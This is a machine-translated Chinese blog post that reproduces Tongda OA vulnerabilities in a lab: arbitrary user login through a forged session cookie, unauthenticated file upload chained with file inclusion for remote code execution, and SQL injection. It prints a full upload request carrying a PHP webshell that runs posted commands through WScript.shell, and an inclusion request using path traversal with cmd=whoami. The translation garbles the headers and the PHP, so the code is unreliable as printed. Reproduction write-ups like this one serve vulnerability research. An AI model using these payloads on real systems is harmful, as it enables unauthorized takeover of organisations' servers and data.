html sql注入_通达OA前台任意用户登录,文件上传和文件包含,SQL注入复现

最新推荐文章于 2024-02-18 16:52:46 发布
最新推荐文章于 2024-02-18 16:52:46 发布
阅读量1k 收藏 2
点赞数
文章标签: html sql注入 sql 包含 sql统计表中各类型金额 windows窗体 登录 sql 卡巴斯基2009授权文件
本文详细分析了通达OA系统的几个主要安全漏洞,包括前台任意用户登录、文件上传与包含导致的RCE(远程代码执行)以及SQL注入问题。攻击者可以利用这些漏洞以任意用户身份登录,上传恶意文件并执行代码,以及进行SQL注入攻击。针对这些问题,文中给出了漏洞复现步骤和防御建议,包括文件上传和包含的验证加强以及SQL参数过滤等措施。
摘要由CSDN通过智能技术生成

b87b6f9cf5ec407400b1d32edf2bfd3c.gif

[size = 9.0000pt]一 系统介绍

通达OA是北京通达信科科技有限公司出品的“ Office Anywhere通达网络智能办公系统”。

突破概览       

进攻名称

影响版本

前台任意用户登录

通达OA <11.5.200417版本,通达OA 2017版本

文件上传,文件包含导致RCE

V11、2017版,2016版,2015版,2013增强版,2013版

SQL注入

测试11.5版

二,进攻复现2.1前台任意用户登录2.1.1突破描述

攻击者在远程且有权授权的情况下,通过利用此漏洞,可以直接以任意用户身份登录到系统(包括系统管理员)

2.1.2漏洞复现

1)访问http://192.168.31.57/general/index.php?isIE=0&modify_pwd=0 ,提示需要登录

36b63eb611035ff6032b03f0d4295c65.png

2)使用poc生成PHPSESSID ,再次访问该网址并抓包,替换cookie中的PHPSESSID为用poc生成的。放包,成功以系统管理员身份登录。

5b8e21c268d7d679bdd4a5c37e7b8bfa.png

58bcd573377e93fd51f8b1ca9a415785.png

2.2文件上传,文件包含导致RCE 2.2.1伸缩描述

在受影响的版本中,攻击者可以在未认证的情况下向服务器上传jpg图片文件,然后包含该文件,造成远程代码执行。该漏洞无需登录即可触发

2.2.2漏洞复现

复现版本:11.3

突破利用链接:

任意文件上传漏洞  /ispirit/im/upload.php

本地文件包含漏洞  /ispirit/interface/gateway.php

1)访问http://192.168.31.57/ispirit/im/upload.php提示未登录

69b2b2bcc286112dc5fb650db576fba2.png

2)用burp抓包合并数据包修改成如下内容(ip替换为OA的ip)

POST /ispirit/im/upload.php HTTP / 1.1

主机:192.168.31.57

内容长度:655

内容类型:多部分/表单数据;boundary = ---- WebKitFormBoundaryBwVAwV3O4sifyhr3

用户代理:Mozilla / 5.0(Windows NT 10.0; Win64; x64)AppleWebKit / 537.36(KHTML,如Gecko)Chrome / 77.0.3865.90 Safari / 537.36

接受编码:gzip,放气

接受语言:zh-CN,zh; q = 0.9

连接方式:关闭

------ WebKitFormBoundaryBwVAwV3O4sifyhr3

内容处置:表单数据;name =“ UPLOAD_MODE”

2

------ WebKitFormBoundaryBwVAwV3O4sifyhr3

内容处置:表单数据;名称=“ P”

------ WebKitFormBoundaryBwVAwV3O4sifyhr3

内容处置:表单数据;name =“ DEST_UID”

1个

------ WebKitFormBoundaryBwVAwV3O4sifyhr3

内容处置:表单数据;name =“ ATTACHMENT”; filename =“ jpg”

内容类型:图片/ jpeg

$ command = $ _ POST ['cmd'];

$ wsh =新的COM('WScript.shell');

$ exec = $ wsh-> exec(“ cmd / c”。$ command);

$ stdout = $ exec-> StdOut();

$ stroutput = $ stdout-> ReadAll();

echo $ stroutput;

?>

------ WebKitFormBoundaryBwVAwV3O4sifyhr3-

修改完初始化数据包

4fa3952e6cbd3e6c3491eb0ae9662eb3.png

可以看到未登录情况下成功上传jpg文件

494e11456f51fdd9b84aceb481d5e00f.png

2)文件包含利用

访问http://192.168.31.57/ispirit/interface/gateway.php,POST给json赋值,指定键为url,值为文件位置,修改为数据包内容如下:

POST /ispirit/interface/gateway.php HTTP / 1.1

主机:192.168.31.57

用户代理:Mozilla / 5.0(Windows NT 10.0; Win64; x64; rv:47.0)Gecko / 20100101 Firefox / 47.0

接受:text / html,application / xhtml + xml,application / xml; q = 0.9,* / *; q = 0.8

接受语言:zh-CN,zh; q = 0.8,en-US; q = 0.5,en; q = 0.3

接受编码:gzip,放气

连接方式:关闭

内容类型:application / x-www-form-urlencoded

内容长度:70

json = {“ url”:“ / general /../../ attach / im / 2009 / 1251075309.jpg”}&cmd = whoami

可以看到,执行“ whoami”成功

4178e7a4a39c3b203742bb60e28f41af.png

2.2.3防御代码分

1)通达OA使用zend加密,需要使用SeayDzend工具解密,解密包含入侵的页面

10fa99a392a11e3b183e4741185ddea4.png

2)文件上传webroot \ ispirit \ im \ upload.php ,如下图,可以看到上传页面对参数P进行验证,如果P非空就不经过auth.php验证可以执行后续代码,利用以下逻辑突破可绕过登录验证进行文件上传

a102a8669cae8c41242c5d983ca53eb4.png

3)文件包含webroot / ispirit / interface / gateway.php,通过foreach循环解析json,如果键和网址替换,获得网址;判断网址是否为空,如果不为空且网址中包含一般/,ispirit /,模块/,就调用include_once函数。

可通过精心构造构造json进入47行的includ_once进行文件包含

9ac5dd0fb18bceee89ef4e0f97b583e2.png

2.3 SQL注入2.31进攻描述

复现版本:11.5

存在多处sql注入

2.3.2进攻复现

1)SQL注入1

登录-个人事务-日程安排-日程查询

cc2292761b8bb3c055e0fc0114deb365.png

fabe9608753a58b467c7f03b5e26fbe1.png

抓包并使用sqlmap测试,参数'starttime'存在注入

611572350f467181099890d6dbc5b77d.png

2)SQL注入2

应用中心-报表中心-报表管理-门店销售(选择统计表进行编辑)

694e6ebf83cb3cd06f810cb2e1c23b96.png

98ddf5e58e02e72bae142cfd910ebf5a.png

抓包并使用sqlmap测试,参数'id'存在注入

c0182b9d241380f1b7c69cc80321a801.png

注入点分析:

webroot \ general \ appbuilder \ modules \ report \ controllers \ RepdetailController.php中操作编辑函数中的$ _GET [“ id”]未进行过滤,直接拼接到sql查询中,进行sql注入

e33cea11bdd128ae9ab933887d5b9c66.png

[size = 9.0000pt]三,参考链接

https://www.cnblogs.com/yuzly/p/13602239.html

https://soapffz.com/sec/562.html#menu_index_2

https://mp.weixin.qq.com/s?__biz=MzAxMzg4NDg1NA==&mid=2247483732&idx=1&sn=062308df7b7ffaf8acb41837e5a703f1&chksm=9b9a8d8daced049b19601c978a98832a08026cefb373e161589db0a0f240ee2205b2d6ebba10&mpshare=1&scene=24&srcid=08225p4xVy6PekmCzfH26zpF&sharer_sharetime=1598138050981&sharer_shareid=b9872b429854cd9a0cc92c30f836e313&key=0a62b63f2856554913d4a4d0f5138fa2ccce483c5db895d5a284a8032f7f7f779d26bf1768b48eecfe3f85da5f7968346828cd498df8c41978242a7c0b687e5a96e6ac4a007890b8e11f7f39ae1b5e3e700aba28fd14e65eddb77806c364ab70d983e5f0fb32942d7f1678b1d236dea354d8ec9e0c2c35d192ea4471b9431b68&ascene=14&uin=MTQwNjQ0NjA2MQ%3D%3D&devicetype=Windows + 10 + x64&version = 62090538&lang = zh_CN&exportkey = AYZemAWNajo3ycraAwg9Bw4%3D&pass_ticket = HaEOXTn7KBAP7GEEWWyyy%2FW1kHjVOPvH5Ner3u2y5uzGHVMPL7PjhSTlE5RNNwx_header = 0

3d5f961a1cd3114cea61f81857a30bf4.gif

weixin_39557797
关注
通达oa SQL注入day
课嗨教育的专栏
04-17 421
最近看爆出了很多day,手上握着的几个泛微,致远都被爆出来了,寻思也发一个通达的,但是通达的爆出来的太多了,我不知道这个有没有被公开,所以也不知道算0day还是xday。 主要问题点在pda/appcenter/submenu.php文件,appid参数,获取其他得小伙伴们应该都懂了。 ...
【漏洞复现通达oa 前台sql注入
失心少年
11-19 582
它涵盖了企业日常办公所需的各项功能,包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用,可以实现随时随地办公,提高工作效率和协作能力。同时,它还具备高度可定制性和扩展性,可以根据企业的实际需求进行定制开发,满足企业的个性化需求。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章的技术资料对任何计算机系统进行入侵操作。
3.13通达OA任意文件上传+包含复现分析
Sylon的博客
05-20 2098
##3.13通达OA任意文件上传+包含复现分析 ##简述 通达OA是北京通达信科科技有限公司出品的 “Office Anywhere 通达网络智能办公系统”。 3月13日,通达OA在官方论坛发布通告称,近日接到用户反馈遭到勒索病毒攻击,提示用户注意安全风险,并且于同一天对所有版本发布了加固补丁。 在受影响的版本,攻击者可以在未认证的情况下向服务器上传jpg图片文件,然后包含文件,造成远程代码执行。该漏洞无需登录即可触发。 影响版本 ###文件上传漏洞为全版本通杀 v11.3 2017 2016 2015
oa 11.10 未授权任意文件上传及提权
失心少年
06-03 995
通达oa一键getshell
sql server哪个版本好用_关于通达OA前台SQL注入到getshell利用思路
weixin_39779975的博客
12-09 842
0x00 前言对于渗透测试来说, 后台的SQL注入其实是很鸡肋的, 所以我们的突破点一定是从一个前台的漏洞开始, 比如前台SQL注入. 通达OA前台SQL注入, 根据之前公开的文章推测数量应该是有多个, 但都没有明确给出payload, 对于没有代码审计能力的人来说是无法直接利用的.通达OA的数据库为MYSQL, MYSQL注入常用的利用方式:(1)当前数据库账户拥有读写权限且知道物理...
【漏洞复现-通达OA通达OA get_datas 存在前台SQL注入漏洞
xiaokp7的博客
02-18 557
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与国企业管理实践相结合形成的综合管理办公平台。通达OA get_datas 存在前台SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
【漏洞复现-通达OA通达OA WHERE_STR 存在前台SQL注入漏洞
xiaokp7的博客
02-18 574
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与国企业管理实践相结合形成的综合管理办公平台。通达OA WHERE_STR存在前台SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
【漏洞复现-通达OA通达OA share存在前台SQL注入漏洞
最新发布
xiaokp7的博客
02-18 770
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。通达OA /share/handle.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。
【漏洞复现-通达OA通达OA report_bi存在前台SQL注入漏洞
xiaokp7的博客
02-18 591
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。通达OA report_bi.func.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。
通达OA附件存储路径问题
03-29
如何修改OA附件保存路径 文件柜的权限控制很好,但是有个问题,我安装通达的硬盘分区很小,我想把个人和公共文件柜的存储路径设置到更大的硬盘分区上但是在设置里没有找到,希望能够指点一下解决办法。 如何修改附件存储路径? 用记事本修改d:\myoa\webroot\inc\oa_config.php $ATTACH_PATH2=realpath($ROOT_PATH."../")."/attach/"; 这句可以改为 $ATTACH_PATH2="e:/attach/"; 然后您把d:\myoa\attach下文件拷贝到e:\attach下。
OA项目源代码+sql语句
08-14
OA项目源代码+sql语句
OA办公完整源码(含数据库脚本)
06-10
一、系统描述 1、包含常用办公所有功能(财务,档案,人力资源,审批,会议,文件,业务等功能); 2、多年的技术积累和大量用户需求的汇总调整,保证了系统的安全性稳定性、易操作、管理维护简单的特点; 3、系统设计开发的规范性与全面性,利于系统的实现、测试、维护、版本升级等。开发人员既可全面了解OA系统所涉及的业务,也能对本身技术提升有所助益,同时减轻了团队开发压力,节约了开发成本; 4、采用B/S架构,用户通过浏览器即能进行联网访问办公。 1、开发环境为Visual Studio 2012,数据库为SQLServer2008R2,使用.net 4.0 开发。 2、管理员登陆名为:admin 密码:admin 3、默认数据库连接字符串在webconfig配置文件修改 4、data文件是数据库文件,附加即可
通达oa服务器文件夹管理,心通达OA知识管理操作指引_心通达OA知识管理使用指导_云市场-华为云...
weixin_36355328的博客
08-09 605
1. 公共文件柜设置【公共文件柜设置】包括对文件柜的名称、权限设置,用户可对已经创建的文件柜进行编辑、删除、权限设置操作。点击新建文件夹,需要填写文件夹序号、名称、最大容量等信息,填写完成之后,点击确定即可,新增的文件夹就会在下方显示。点击编辑可以对文件夹的序号、名称、文件夹容量等信息进行修改。点击删除,会删除当前文件夹。点击设置文件夹权限与公共文件柜-文件夹操作-设置文件夹权限的操作是一致的,选...
通达OA v11.7后台SQL注入
qq_44657899的博客
07-08 1663
文章目录漏洞描述漏洞影响漏洞复现 漏洞描述 通达OA v11.7后台存在SQL注入,可通过此漏洞写入恶意后门文件攻击目标服务器。 漏洞影响 通达OA <= v11.7 漏洞复现 下载通达oa 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe 漏洞位置:/general/hr/manage/query/delete_cascade.php ...
关于通达OA某平台版本的函数混淆处理诀窍
SSD软件技术开发组的专栏
11-24 887
通达OA是国内OA行业的翘楚,在办公自动化方面扮演着十分重要的角色。在国内的IT业界一直有一个潜规则:名气大,功能出色的商业软件一定就是模仿与抄袭的对象。通达OA自然也免不了被许多开发者或者软件公司拿来当练手的样本。它是由php语言开发的。目前php的逆向解密已经不是什么非常困难的工程。很多所谓自主创新的OA软件都是照抄通达的。如果懂逆向的朋友,一定知道,解密出来的代码,很多是错误的,甚至是把某些
通达oa漏洞复现
weixin_45006525的博客
05-25 1398
通达oa任意用户登录复现 1.漏洞原理 首先源码分析跟踪文件/general/login_code.php,php文件均经过了zend|54加密,使用在线网站解密即可 在线zend解密 源码分析: 第12行随机生成了一串登录的CODEUID,并在第35行通过set_cache方法将该标识CODEUID插入到redis缓存,且第37行将该CODEUID进行了输出。所以想到通过访问该页面可以获得codeuid。 根进logincheck_code.php 发现uid可控,post可以指定uid的值。cod
通达OA后台SQL注入到RCE
box
09-18 2046
0x00 前戏 一趟护网下来大佬们收割了一大波0day,奈何自己没有没有技术,只能打打靶机。 可能是自己比较菜原因,复现过程遇到不少坑。 0x01 测试环境 测试版本:11.5.200417 版本 限制条件:需要账号登录 大佬们说是 通达OA v11.7版本,但是试了试 11.5.200417 版本也是同样存在 SQL注入的,更惊喜的是,刚好可以使用11.5版本的前台任意用户登录漏洞,绕过登录需要登录这一条件。 漏洞原理代码分析可以参考云川安全团队的师傅的文章 0x02 漏洞复现 漏洞url:http:
通达OA任意文件上传/文件包含RCE漏洞分析
god_Zeo的安全博客
03-30 2558
通达OA任意文件上传/文件包含RCE漏洞分析0x01 前提0x01 漏洞介绍0x02 漏洞分析首先下载安装绕过身份验证文件上传部分变量传递问题文件包含部分 0x01 前提 关于这个漏洞: ​ 利用方式大致有两种: 包含日志文件。 绕过身份验证文件上传然后在文件包含。 0x01 漏洞介绍 通达OA系统代表了协同OA的先进理念,16年研发铸就成熟OA产品,协同OA软件行业唯一央企团队研发,多次摘取...
通达OA文件上传文件包含漏洞引发的RCE分析
"通达OA任意文件上传配合文件包含导致的RCE影响多个版本,包括V11版、2015-2017版、2013版以及2013增强版。利用该漏洞,攻击者可以通过Python等脚本执行命令,如`python3.pyhttp://10.0.0.1:81whoami`,获取服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值